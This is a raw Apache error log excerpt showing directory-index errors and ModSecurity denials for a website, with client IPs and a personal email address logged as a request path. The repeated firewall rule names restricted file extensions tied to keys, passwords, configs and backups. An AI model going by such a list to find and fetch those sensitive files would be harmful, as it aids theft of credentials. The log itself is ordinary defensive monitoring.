(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 20:34:03.626191 2026] [autoindex:error] [pid 20688:tid 20736] [client 89.117.41.86:43236] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 07 22:58:12.526479 2026] [:error] [pid 20688:tid 20734] [client 173.252.70.39:64050] [client 173.252.70.39] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVv5O5MBQLmF8SMCtedJAAAAY8"] [Tue Apr 07 22:58:28.817577 2026] [:error] [pid 11567:tid 11649] [client 173.252.70.6:45470] [client 173.252.70.6] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-512000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.elavocato.net"] [uri "/robots.txt"] [unique_id "adVv9MclMU6S39A1SfatAQAAAQw"] [Tue Apr 07 22:58:29.018634 2026] [:error] [pid 11567:tid 11635] [client 57.141.0.41:28963] [client 57.141.0.41] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-512000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.elavocato.net"] [uri "/robots.txt"] [unique_id "adVv9cclMU6S39A1SfatBQAAAQA"] [Tue Apr 07 22:58:29.077364 2026] [:error] [pid 11567:tid 11638] [client 57.141.0.8:27971] [client 57.141.0.8] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-512000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.elavocato.net"] [uri "/robots.txt"] [unique_id "adVv9cclMU6S39A1SfatCAAAAQI"] [Tue Apr 07 22:58:37.819872 2026] [:error] [pid 4032:tid 4080] [client 173.252.79.7:61540] [client 173.252.79.7] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVv_d1Th95kc8QT9CZPiQAAAVU"] [Tue Apr 07 22:58:50.666188 2026] [:error] [pid 11567:tid 11646] [client 173.252.87.6:58632] [client 173.252.87.6] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVwCsclMU6S39A1SfauHwAAAQk"] [Tue Apr 07 22:58:53.923030 2026] [:error] [pid 11567:tid 11659] [client 69.171.231.112:50194] [client 69.171.231.112] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVwDcclMU6S39A1SfauSAAAARM"] [Tue Apr 07 22:58:55.603757 2026] [:error] [pid 3200:tid 3225] [client 173.252.69.3:38548] [client 173.252.69.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVwDydMwfjWBrOSx911PgAAANc"] [Tue Apr 07 22:59:42.351824 2026] [:error] [pid 3200:tid 3217] [client 69.171.231.27:41026] [client 69.171.231.27] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adVwPidMwfjWBrOSx912bAAAAM8"] [Wed Apr 08 04:14:48.778492 2026] [autoindex:error] [pid 22688:tid 22713] [client 20.17.177.125:56165] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com